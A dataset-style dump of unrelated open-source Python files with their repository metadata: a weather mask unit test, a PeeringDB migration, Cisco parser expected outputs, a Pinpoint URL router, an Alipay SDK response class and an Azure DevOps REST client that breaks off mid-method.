[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
self.assertArrayEqual(result.data, expected_result)
def test_time_bounds_standard_grid_ccrs(self):
"""Test day_night mask with standard_grid_ccrs projection for a cube
with a time coordinate with bounds.
This test compares against a reference case in which a cube without
time bounds is adjusted such that its time falls at the mid-point of
the time bounds being tested. This should return the same result as
the cube with time bounds. The result is also compared against an
array of expected values."""
vt = datetime(2015, 11, 20, 8, 2, tzinfo=pytz.UTC)
ref = self.cube.copy()
ref.coord("time").points = [vt.timestamp()]
ref_result = DayNightMask().process(ref)
result = DayNightMask().process(self.cube_time_bounds)
expected_result = np.array(
[
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
]
)
self.assertArrayEqual(result.data, expected_result)
self.assertArrayEqual(result.data, ref_result.data)
def test_spot_mask(self):
"""Test day_night mask with lat lon spot data. Note that the
expected data is shown as a grid for neatness, but is flattened
in the comparison as the returned spot mask is one dimensional."""
result = DayNightMask().process(self.spot_cube)
expected_result = np.array(
[
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
]
)
self.assertArrayEqual(result.data, expected_result.flatten())
if __name__ == "__main__":
unittest.main()
|
de9936507f521a751952bf94d6977ff55527a309
|
4feb5744ab5a26aeeb04573e4944d2bf4d1a6a2a
|
/peeringdb_server/migrations/0045_fac_rencode_null_out.py
|
43a915af4880e123018770a4659a8d5e6b3f6ec0
|
[
"BSD-2-Clause"
] |
permissive
|
peeringdb/peeringdb
|
cb79f809c4bb8cc5192180366df1f05d8fc0111f
|
3f62b2d97c78ccf151fb1a5761637e28463b9541
|
refs/heads/master
| 2023-09-04T09:26:43.741086
| 2023-08-22T19:20:34
| 2023-08-22T19:20:34
| 60,563,174
| 311
| 121
|
BSD-2-Clause
| 2023-09-13T02:13:42
| 2016-06-06T21:49:25
|
Python
|
UTF-8
|
Python
| false
| false
| 497
|
py
|
0045_fac_rencode_null_out.py
|
# Generated by Django 2.2.13 on 2020-07-02 19:36
from django.db import migrations
def null_rencode(apps, schema_editor):
Facility = apps.get_model("peeringdb_server", "Facility")
for fac in Facility.handleref.all():
if fac.rencode:
fac.rencode = ""
fac.save()
class Migration(migrations.Migration):
dependencies = [
("peeringdb_server", "0044_ixlan_ixf_fields"),
]
operations = [
migrations.RunPython(null_rencode),
]
|
3abe3e3fe0274c6bf00be1ef42f0a48c8b016d2e
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/ios/tests/ShowMplsLdpCapabilities/cli/equal/golden_output_all_expected.py
|
4cd8502956f2c9c610443b18d4ae333bf7351057
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 311
|
py
|
golden_output_all_expected.py
|
expected_output = {
"ldp_capabilities": {
"iccp_type": "0x0405",
"mldp_multipoint_to_multipoint": "0x0509",
"dynamic_anouncement": "0x0506",
"typed_wildcard": "0x050B",
"maj_version": 1,
"mldp_point_to_multipoint": "0x0508",
"min_version": 0,
}
}
|
29b398239de6d4ab89ce5c7446fcc32e031fce13
|
3a6a211ea0d32405497fbd6486c490bb147e25f9
|
/dashboard/dashboard/pinpoint/dispatcher.py
|
be40d3ee333d143e8a979efd38ca636c36671054
|
[
"BSD-3-Clause"
] |
permissive
|
catapult-project/catapult
|
e2cbdd5eb89f3b1492fc8752494e62ea1df4bae0
|
53102de187a48ac2cfc241fef54dcbc29c453a8e
|
refs/heads/main
| 2021-05-25T07:37:22.832505
| 2021-05-24T08:01:49
| 2021-05-25T06:07:38
| 33,947,548
| 2,032
| 742
|
BSD-3-Clause
| 2022-08-26T16:01:18
| 2015-04-14T17:49:05
|
HTML
|
UTF-8
|
Python
| false
| false
| 2,072
|
py
|
dispatcher.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Dispatches requests to request handler classes."""
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import webapp2
from dashboard.pinpoint import handlers
_URL_MAPPING = [
# Public API.
webapp2.Route(r'/api/config', handlers.Config),
webapp2.Route(r'/api/commit', handlers.Commit),
webapp2.Route(r'/api/commits', handlers.Commits),
webapp2.Route(r'/api/generate-results2/<job_id>',
handlers.Results2Generator),
webapp2.Route(r'/api/isolate', handlers.Isolate),
webapp2.Route(r'/api/isolate/<builder_name>/<git_hash>/<target>',
handlers.CASReference),
webapp2.Route(r'/api/cas', handlers.CASReference),
webapp2.Route(r'/api/cas/<builder_name>/<git_hash>/<target>',
handlers.CASReference),
webapp2.Route(r'/api/job/cancel', handlers.Cancel),
webapp2.Route(r'/api/job/<job_id>', handlers.Job),
webapp2.Route(r'/api/jobs', handlers.Jobs),
webapp2.Route(r'/api/migrate', handlers.Migrate),
webapp2.Route(r'/api/new', handlers.New),
webapp2.Route(r'/api/results2/<job_id>', handlers.Results2),
webapp2.Route(r'/api/stats', handlers.Stats),
webapp2.Route(r'/api/queue-stats/<configuration>', handlers.QueueStats),
# Used internally by Pinpoint. Not accessible from the public API.
webapp2.Route(r'/api/run/<job_id>', handlers.Run),
webapp2.Route(r'/cron/isolate-cleanup', handlers.IsolateCleanup),
webapp2.Route(r'/cron/refresh-jobs', handlers.RefreshJobs),
webapp2.Route(r'/cron/fifo-scheduler', handlers.FifoScheduler),
# The /_ah/push-handlers/* paths have a special meaning for PubSub
# notifications, and is treated especially by the AppEngine environment.
webapp2.Route(r'/_ah/push-handlers/task-updates', handlers.TaskUpdates),
]
APP = webapp2.WSGIApplication(_URL_MAPPING, debug=False)
|
40d12f6eb8249cdfe4469a915f07e5a00204f67e
|
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
|
/alipay/aop/api/response/KoubeiAdvertDataConfQueryResponse.py
|
4864fb4bf7555728dcdac477575d3f3b128eaa82
|
[
"Apache-2.0"
] |
permissive
|
alipay/alipay-sdk-python-all
|
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
|
1fad300587c9e7e099747305ba9077d4cd7afde9
|
refs/heads/master
| 2023-08-27T21:35:01.778771
| 2023-08-23T07:12:26
| 2023-08-23T07:12:26
| 133,338,689
| 247
| 70
|
Apache-2.0
| 2023-04-25T04:54:02
| 2018-05-14T09:40:54
|
Python
|
UTF-8
|
Python
| false
| false
| 1,870
|
py
|
KoubeiAdvertDataConfQueryResponse.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.response.AlipayResponse import AlipayResponse
from alipay.aop.api.domain.KbadvertChannelTypeResponse import KbadvertChannelTypeResponse
from alipay.aop.api.domain.KbadvertCommissionLimit import KbadvertCommissionLimit
class KoubeiAdvertDataConfQueryResponse(AlipayResponse):
def __init__(self):
super(KoubeiAdvertDataConfQueryResponse, self).__init__()
self._channel_types = None
self._commission_limits = None
@property
def channel_types(self):
return self._channel_types
@channel_types.setter
def channel_types(self, value):
if isinstance(value, list):
self._channel_types = list()
for i in value:
if isinstance(i, KbadvertChannelTypeResponse):
self._channel_types.append(i)
else:
self._channel_types.append(KbadvertChannelTypeResponse.from_alipay_dict(i))
@property
def commission_limits(self):
return self._commission_limits
@commission_limits.setter
def commission_limits(self, value):
if isinstance(value, list):
self._commission_limits = list()
for i in value:
if isinstance(i, KbadvertCommissionLimit):
self._commission_limits.append(i)
else:
self._commission_limits.append(KbadvertCommissionLimit.from_alipay_dict(i))
def parse_response_content(self, response_content):
response = super(KoubeiAdvertDataConfQueryResponse, self).parse_response_content(response_content)
if 'channel_types' in response:
self.channel_types = response['channel_types']
if 'commission_limits' in response:
self.commission_limits = response['commission_limits']
|
851a524384b836fe6b35692286493b7c258fc3de
|
927b0170d041bee8aca868e88af19e2b8935f3a3
|
/tests/__init__.py
|
102c3ed4545d0963b55cfbd6b0c0837052d86d48
|
[
"MIT",
"CC-BY-4.0",
"ODbL-1.0"
] |
permissive
|
adbar/simplemma
|
f6cdfb1b3f314efac66e1c741cc97fe0a76be3dc
|
fa1d96469ca601b5249b8d5cbb42c1474cfd83bb
|
refs/heads/main
| 2023-08-19T05:09:04.815007
| 2023-08-02T10:57:50
| 2023-08-02T10:57:50
| 330,707,034
| 102
| 6
|
MIT
| 2023-09-12T17:03:17
| 2021-01-18T15:22:27
|
Python
|
UTF-8
|
Python
| false
| false
| 39
|
py
|
__init__.py
|
"""Unit test package for simplemma."""
|
09935ba8f34fb00a353cfe63df112c5e8ab2825a
|
5ef6c8d47864f471e26b9902d61f8c687e941f05
|
/src/genie/libs/parser/iosxe/tests/ShowIpPimInterfaceDf/cli/equal/golden_output_expected.py
|
23533da361b8ad9c3c28f0de87b55d8d92731729
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genieparser
|
169c196558f1c1a0f0d10650876096f993224917
|
b531eff760b2e44cd69d7a2716db6f866907c239
|
refs/heads/master
| 2023-09-03T08:56:18.831340
| 2023-08-29T22:32:02
| 2023-08-29T22:32:02
| 131,621,824
| 247
| 409
|
Apache-2.0
| 2023-08-29T22:32:04
| 2018-04-30T16:51:50
|
Python
|
UTF-8
|
Python
| false
| false
| 4,458
|
py
|
golden_output_expected.py
|
expected_output = {
"vrf": {
"default": {
"address_family": {
"ipv4": {
"rp": {
"bidir": {
"interface_df_election": {
"10.10.0.2 Ethernet3/3": {
"df_address": "10.4.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Ethernet3/3",
},
"10.10.0.3 Ethernet3/3": {
"df_address": "10.4.0.3",
"metric": 0,
"df_uptime": "00:01:49",
"address": "10.10.0.3",
"winner_metric": 0,
"interface_name": "Ethernet3/3",
},
"10.10.0.3 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 409600,
"df_uptime": "00:02:32",
"address": "10.10.0.3",
"winner_metric": 409600,
"interface_name": "Ethernet3/4",
},
"10.10.0.5 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 435200,
"df_uptime": "00:02:16",
"address": "10.10.0.5",
"winner_metric": 435200,
"interface_name": "Ethernet3/4",
},
"10.10.0.2 Loopback0": {
"df_address": "10.10.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Loopback0",
},
"10.10.0.2 Ethernet3/4": {
"df_address": "10.5.0.2",
"metric": 0,
"df_uptime": "00:03:49",
"address": "10.10.0.2",
"winner_metric": 0,
"interface_name": "Ethernet3/4",
},
"10.10.0.3 Loopback0": {
"df_address": "10.10.0.2",
"metric": 409600,
"df_uptime": "00:02:32",
"address": "10.10.0.3",
"winner_metric": 409600,
"interface_name": "Loopback0",
},
"10.10.0.5 Loopback0": {
"df_address": "10.10.0.2",
"metric": 435200,
"df_uptime": "00:02:16",
"address": "10.10.0.5",
"winner_metric": 435200,
"interface_name": "Loopback0",
},
"10.10.0.5 Ethernet3/3": {
"df_address": "10.4.0.4",
"metric": 409600,
"df_uptime": "00:01:49",
"address": "10.10.0.5",
"winner_metric": 409600,
"interface_name": "Ethernet3/3",
},
}
}
}
}
}
}
}
}
|
c8eeff5b1806fcae932d1615f38442817b6e16a3
|
98810fbf90a42028915a88bfac9fb8cb8681008e
|
/azure-devops/azext_devops/devops_sdk/v5_0/core/core_client.py
|
ff9b2f75677687a0af63f0141d64d2c53ddabc8f
|
[
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-unicode",
"LGPL-3.0-only",
"LicenseRef-scancode-warranty-disclaimer",
"PSF-2.0",
"PostgreSQL",
"LicenseRef-scancode-python-cwi",
"LGPL-2.1-or-later",
"LicenseRef-scancode-proprietary-license",
"LGPL-2.1-only",
"CC-BY-4.0",
"Python-2.0",
"MPL-1.1",
"OpenSSL",
"LicenseRef-scancode-other-copyleft",
"LicenseRef-scancode-unknown-license-reference",
"MPL-1.0",
"ISC",
"GPL-2.0-only",
"Apache-2.0",
"LicenseRef-scancode-public-domain",
"BSD-2-Clause",
"GPL-1.0-or-later",
"MPL-2.0"
] |
permissive
|
Azure/azure-devops-cli-extension
|
ba87357a8243e1318f100791fc32acbb59448d05
|
bd34a6fd0658a15dadf6c09c7f6217ca5ffa662b
|
refs/heads/master
| 2023-08-29T10:56:54.228674
| 2023-07-17T04:37:06
| 2023-07-17T04:37:06
| 107,708,057
| 419
| 208
|
MIT
| 2023-08-02T02:10:10
| 2017-10-20T17:39:11
|
Python
|
UTF-8
|
Python
| false
| false
| 24,344
|
py
|
core_client.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class CoreClient(Client):
"""Core
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
def __init__(self, base_url=None, creds=None):
super(CoreClient, self).__init__(base_url, creds)
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
self._serialize = Serializer(client_models)
self._deserialize = Deserializer(client_models)
resource_area_identifier = '79134c72-4a58-4b42-976c-04e7115f32bf'
def create_connected_service(self, connected_service_creation_data, project_id):
"""CreateConnectedService.
[Preview API]
:param :class:`<WebApiConnectedServiceDetails> <azure.devops.v5_0.core.models.WebApiConnectedServiceDetails>` connected_service_creation_data:
:param str project_id:
:rtype: :class:`<WebApiConnectedService> <azure.devops.v5_0.core.models.WebApiConnectedService>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(connected_service_creation_data, 'WebApiConnectedServiceDetails')
response = self._send(http_method='POST',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values,
content=content)
return self._deserialize('WebApiConnectedService', response)
def get_connected_service_details(self, project_id, name):
"""GetConnectedServiceDetails.
[Preview API]
:param str project_id:
:param str name:
:rtype: :class:`<WebApiConnectedServiceDetails> <azure.devops.v5_0.core.models.WebApiConnectedServiceDetails>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if name is not None:
route_values['name'] = self._serialize.url('name', name, 'str')
response = self._send(http_method='GET',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values)
return self._deserialize('WebApiConnectedServiceDetails', response)
def get_connected_services(self, project_id, kind=None):
"""GetConnectedServices.
[Preview API]
:param str project_id:
:param str kind:
:rtype: [WebApiConnectedService]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if kind is not None:
query_parameters['kind'] = self._serialize.query('kind', kind, 'str')
response = self._send(http_method='GET',
location_id='b4f70219-e18b-42c5-abe3-98b07d35525e',
version='5.0-preview.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[WebApiConnectedService]', self._unwrap_collection(response))
def get_team_members_with_extended_properties(self, project_id, team_id, top=None, skip=None):
"""GetTeamMembersWithExtendedProperties.
Get a list of members for a specific team.
:param str project_id: The name or ID (GUID) of the team project the team belongs to.
:param str team_id: The name or ID (GUID) of the team .
:param int top:
:param int skip:
:rtype: [TeamMember]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='294c494c-2600-4d7e-b76c-3dd50c3c95be',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TeamMember]', self._unwrap_collection(response))
def get_process_by_id(self, process_id):
"""GetProcessById.
Get a process by ID.
:param str process_id: ID for a process.
:rtype: :class:`<Process> <azure.devops.v5_0.core.models.Process>`
"""
route_values = {}
if process_id is not None:
route_values['processId'] = self._serialize.url('process_id', process_id, 'str')
response = self._send(http_method='GET',
location_id='93878975-88c5-4e6a-8abb-7ddd77a8a7d8',
version='5.0',
route_values=route_values)
return self._deserialize('Process', response)
def get_processes(self):
"""GetProcesses.
Get a list of processes.
:rtype: [Process]
"""
response = self._send(http_method='GET',
location_id='93878975-88c5-4e6a-8abb-7ddd77a8a7d8',
version='5.0')
return self._deserialize('[Process]', self._unwrap_collection(response))
def get_project_collection(self, collection_id):
"""GetProjectCollection.
Get project collection with the specified id or name.
:param str collection_id:
:rtype: :class:`<TeamProjectCollection> <azure.devops.v5_0.core.models.TeamProjectCollection>`
"""
route_values = {}
if collection_id is not None:
route_values['collectionId'] = self._serialize.url('collection_id', collection_id, 'str')
response = self._send(http_method='GET',
location_id='8031090f-ef1d-4af6-85fc-698cd75d42bf',
version='5.0',
route_values=route_values)
return self._deserialize('TeamProjectCollection', response)
def get_project_collections(self, top=None, skip=None):
"""GetProjectCollections.
Get project collection references for this application.
:param int top:
:param int skip:
:rtype: [TeamProjectCollectionReference]
"""
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='8031090f-ef1d-4af6-85fc-698cd75d42bf',
version='5.0',
query_parameters=query_parameters)
return self._deserialize('[TeamProjectCollectionReference]', self._unwrap_collection(response))
def get_project(self, project_id, include_capabilities=None, include_history=None):
"""GetProject.
Get project with the specified id or name, optionally including capabilities.
:param str project_id:
:param bool include_capabilities: Include capabilities (such as source control) in the team project result (default: false).
:param bool include_history: Search within renamed projects (that had such name in the past).
:rtype: :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if include_capabilities is not None:
query_parameters['includeCapabilities'] = self._serialize.query('include_capabilities', include_capabilities, 'bool')
if include_history is not None:
query_parameters['includeHistory'] = self._serialize.query('include_history', include_history, 'bool')
response = self._send(http_method='GET',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TeamProject', response)
def get_projects(self, state_filter=None, top=None, skip=None, continuation_token=None, get_default_team_image_url=None):
"""GetProjects.
Get all projects in the organization that the authenticated user has access to.
:param str state_filter: Filter on team projects in a specific team project state (default: WellFormed).
:param int top:
:param int skip:
:param str continuation_token:
:param bool get_default_team_image_url:
:rtype: [TeamProjectReference]
"""
query_parameters = {}
if state_filter is not None:
query_parameters['stateFilter'] = self._serialize.query('state_filter', state_filter, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
if continuation_token is not None:
query_parameters['continuationToken'] = self._serialize.query('continuation_token', continuation_token, 'str')
if get_default_team_image_url is not None:
query_parameters['getDefaultTeamImageUrl'] = self._serialize.query('get_default_team_image_url', get_default_team_image_url, 'bool')
response = self._send(http_method='GET',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
query_parameters=query_parameters)
return self._deserialize('[TeamProjectReference]', self._unwrap_collection(response))
def queue_create_project(self, project_to_create):
"""QueueCreateProject.
Queues a project to be created. Use the [GetOperation](../../operations/operations/get) to periodically check for create project status.
:param :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>` project_to_create: The project to create.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
content = self._serialize.body(project_to_create, 'TeamProject')
response = self._send(http_method='POST',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
content=content)
return self._deserialize('OperationReference', response)
def queue_delete_project(self, project_id):
"""QueueDeleteProject.
Queues a project to be deleted. Use the [GetOperation](../../operations/operations/get) to periodically check for delete project status.
:param str project_id: The project id of the project to delete.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
response = self._send(http_method='DELETE',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values)
return self._deserialize('OperationReference', response)
def update_project(self, project_update, project_id):
"""UpdateProject.
Update an existing project's name, abbreviation, or description.
:param :class:`<TeamProject> <azure.devops.v5_0.core.models.TeamProject>` project_update: The updates for the project.
:param str project_id: The project id of the project to update.
:rtype: :class:`<OperationReference> <azure.devops.v5_0.core.models.OperationReference>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(project_update, 'TeamProject')
response = self._send(http_method='PATCH',
location_id='603fe2ac-9723-48b9-88ad-09305aa6c6e1',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('OperationReference', response)
def get_project_properties(self, project_id, keys=None):
"""GetProjectProperties.
[Preview API] Get a collection of team project properties.
:param str project_id: The team project ID.
:param [str] keys: A comma-delimited string of team project property names. Wildcard characters ("?" and "*") are supported. If no key is specified, all properties will be returned.
:rtype: [ProjectProperty]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if keys is not None:
keys = ",".join(keys)
query_parameters['keys'] = self._serialize.query('keys', keys, 'str')
response = self._send(http_method='GET',
location_id='4976a71a-4487-49aa-8aab-a1eda469037a',
version='5.0-preview.1',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[ProjectProperty]', self._unwrap_collection(response))
def set_project_properties(self, project_id, patch_document):
"""SetProjectProperties.
[Preview API] Create, update, and delete team project properties.
:param str project_id: The team project ID.
:param :class:`<[JsonPatchOperation]> <azure.devops.v5_0.core.models.[JsonPatchOperation]>` patch_document: A JSON Patch document that represents an array of property operations. See RFC 6902 for more details on JSON Patch. The accepted operation verbs are Add and Remove, where Add is used for both creating and updating properties. The path consists of a forward slash and a property name.
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(patch_document, '[JsonPatchOperation]')
self._send(http_method='PATCH',
location_id='4976a71a-4487-49aa-8aab-a1eda469037a',
version='5.0-preview.1',
route_values=route_values,
content=content,
media_type='application/json-patch+json')
def create_or_update_proxy(self, proxy):
"""CreateOrUpdateProxy.
[Preview API]
:param :class:`<Proxy> <azure.devops.v5_0.core.models.Proxy>` proxy:
:rtype: :class:`<Proxy> <azure.devops.v5_0.core.models.Proxy>`
"""
content = self._serialize.body(proxy, 'Proxy')
response = self._send(http_method='PUT',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
content=content)
return self._deserialize('Proxy', response)
def delete_proxy(self, proxy_url, site=None):
"""DeleteProxy.
[Preview API]
:param str proxy_url:
:param str site:
"""
query_parameters = {}
if proxy_url is not None:
query_parameters['proxyUrl'] = self._serialize.query('proxy_url', proxy_url, 'str')
if site is not None:
query_parameters['site'] = self._serialize.query('site', site, 'str')
self._send(http_method='DELETE',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
query_parameters=query_parameters)
def get_proxies(self, proxy_url=None):
"""GetProxies.
[Preview API]
:param str proxy_url:
:rtype: [Proxy]
"""
query_parameters = {}
if proxy_url is not None:
query_parameters['proxyUrl'] = self._serialize.query('proxy_url', proxy_url, 'str')
response = self._send(http_method='GET',
location_id='ec1f4311-f2b4-4c15-b2b8-8990b80d2908',
version='5.0-preview.2',
query_parameters=query_parameters)
return self._deserialize('[Proxy]', self._unwrap_collection(response))
def create_team(self, team, project_id):
"""CreateTeam.
Create a team in a team project.
:param :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>` team: The team data used to create the team.
:param str project_id: The name or ID (GUID) of the team project in which to create the team.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
content = self._serialize.body(team, 'WebApiTeam')
response = self._send(http_method='POST',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
content=content)
return self._deserialize('WebApiTeam', response)
def delete_team(self, project_id, team_id):
"""DeleteTeam.
Delete a team.
:param str project_id: The name or ID (GUID) of the team project containing the team to delete.
:param str team_id: The name of ID of the team to delete.
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
self._send(http_method='DELETE',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values)
def get_team(self, project_id, team_id):
"""GetTeam.
Get a specific team.
:param str project_id: The name or ID (GUID) of the team project containing the team.
:param str team_id: The name or ID (GUID) of the team.
:rtype: :class:`<WebApiTeam> <azure.devops.v5_0.core.models.WebApiTeam>`
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
if team_id is not None:
route_values['teamId'] = self._serialize.url('team_id', team_id, 'str')
response = self._send(http_method='GET',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values)
return self._deserialize('WebApiTeam', response)
def get_teams(self, project_id, mine=None, top=None, skip=None):
"""GetTeams.
Get a list of teams.
:param str project_id:
:param bool mine: If true return all the teams requesting user is member, otherwise return all the teams user has read access
:param int top: Maximum number of teams to return.
:param int skip: Number of teams to skip.
:rtype: [WebApiTeam]
"""
route_values = {}
if project_id is not None:
route_values['projectId'] = self._serialize.url('project_id', project_id, 'str')
query_parameters = {}
if mine is not None:
query_parameters['$mine'] = self._serialize.query('mine', mine, 'bool')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='d30a3dd1-f8ba-442a-b86a-bd0c0c383e59',
version='5.0',
route_values=route_values,
query_parameters=query_parameters)
